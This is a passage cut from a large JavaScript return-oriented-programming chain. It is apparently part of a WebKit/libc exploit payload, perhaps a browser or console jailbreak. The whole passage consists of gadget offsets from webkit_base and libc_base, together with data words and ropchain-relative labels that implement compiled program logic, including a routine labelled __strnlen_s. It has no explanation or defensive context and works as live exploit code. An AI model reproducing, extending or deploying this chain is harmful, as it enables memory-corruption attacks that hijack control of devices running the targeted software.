libc_base+763368 //pop rcx
]);
//L2621:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2622:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2623:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2624:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+172376, //L2626
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2626:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+172504, //L2628
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+172520, //L2629
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+172488, //L2627
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2627:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2628:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2629:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+172632, //L2631
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+172680, //L2634
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+172648, //L2632
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2631:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2632:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2633:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2634:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+172792, //L2635+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+172784, //L2635
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L2635:
db([0, 0]); // 0x0
set_gadgets([
ropchain+172808, //L2635+24
ropchain+175056, //L2630
libc_base+764760, //pop rsi
ropchain+172848, //L2636
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2636:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2638:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+172968, //L2641
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+172952, //L2639
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2639:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2641:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+173080, //L2642
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+173128, //L2645
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+173096, //L2643
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2642:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2643:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2644:
db([8, 0]); // 0x8
set_gadget(libc_base+759608,); //pop rax
//L2645:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+173232, //L2648
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+173216, //L2646
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2646:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2648:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+173376, //L2651
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+173344, //L2649
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+173360, //L2650
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2649:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2650:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2651:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+173456, //L2652
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2652:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2654:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+173576, //L2657
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+173560, //L2655
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2655:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2657:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+173736, //L2661
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+173704, //L2659
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+173720, //L2660
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2658:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2659:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2660:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2661:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+173792, //L2663
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2663:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+173920, //L2665
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+173936, //L2666
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+173904, //L2664
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2664:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2665:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2666:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+174096, //L2670
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+174064, //L2668
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+174080, //L2669
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2667:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2668:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2669:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2670:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+174152, //L2672
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2672:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+174280, //L2674
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+174296, //L2675
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+174264, //L2673
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2673:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2674:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2675:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+174376, //L2676
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+174392, //L2677
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2676:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2677:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+174488, //L2679
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+174472, //L2678
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2678:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2679:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+174568, //L2680
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2680:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2682:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+174688, //L2685
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+174672, //L2683
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2683:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2685:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+174768, //L2686
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+174784, //L2687
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2686:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2687:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+174864, //L2689
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+174896, //L2691
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2689:
db([0, 0]); // 0x0
set_gadgets([
libc_base+759608, //pop rax
//L2690:
ropchain+175024, //L2688
libc_base+144605 //pop rdi
]);
//L2691:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+175000, //L2693
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+175016, //L2692
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2693:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2692:
db([0, 0]); // 0x0
//L2688:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L2630:
libc_base+764760, //pop rsi
ropchain+175136, //L2695
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+175120, //L2694
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2694:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2695:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+175240, //L2696
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+175256, //L2697
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2696:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2697:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+175376, //L2698
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+175360, //L2699
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2699:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2698:
db([0, 0]); // 0x0
//__strnlen_s:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+175448, //L2701
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L2701:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+175512, //L2703
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L2703:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+175584, //L2704
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2704:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2706:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+175704, //L2709
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+175688, //L2707
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2707:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2709:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+175792, //L2710
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+175808, //L2712
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2710:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2712:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2713:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+175888, //L2715
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2715:
db([0, 0]); // 0x0
//L2714:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+175936, //L2717
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2717:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2719:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+176056, //L2722
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+176040, //L2720
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2720:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2722:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+176136, //L2723
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+176152, //L2724
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2723:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2724:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+176312, //L2728
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+176280, //L2726
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+176296, //L2727
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2725:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2726:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2727:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2728:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+176368, //L2730
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2730:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+176496, //L2732
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+176512, //L2733
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+176480, //L2731
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2731:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2732:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2733:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+176672, //L2737
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+176640, //L2735
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+176656, //L2736
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2734:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2735:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2736:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2737:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+176728, //L2739
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2739:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+176856, //L2741
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+176872, //L2742
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+176840, //L2740
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2740:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2741:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2742:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+177032, //L2746
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+177000, //L2744
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+177016, //L2745
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2743:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2744:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2745:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2746:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+177088, //L2748
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2748:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+177216, //L2750
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+177232, //L2751
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+177200, //L2749
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2749:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2750:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2751:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+177392, //L2756
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+177408, //L2757
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+177344, //L2753
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2753:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2754:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L2755:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2756:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2757:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+177520, //L2758+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+177512, //L2758
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L2758:
db([0, 0]); // 0x0
set_gadgets([
ropchain+177536, //L2758+24
ropchain+178280, //L2752
libc_base+764760, //pop rsi
ropchain+177576, //L2759
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2759:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2761:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+177696, //L2764
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+177680, //L2762
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2762:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2764:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+177840, //L2767
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+177808, //L2765
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+177824, //L2766
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2765:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2766:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2767:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+177928, //L2769
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L2768:
db([4294967295, 4294967295]); // -0x1
set_gadget(libc_base+759608,); //pop rax
//L2769:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+177984, //L2770
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2770:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2772:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+178064, //L2774
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2774:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+178168, //L2775
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+178200, //L2777
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2775:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2776:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2777:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+178272, //L2778
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2778:
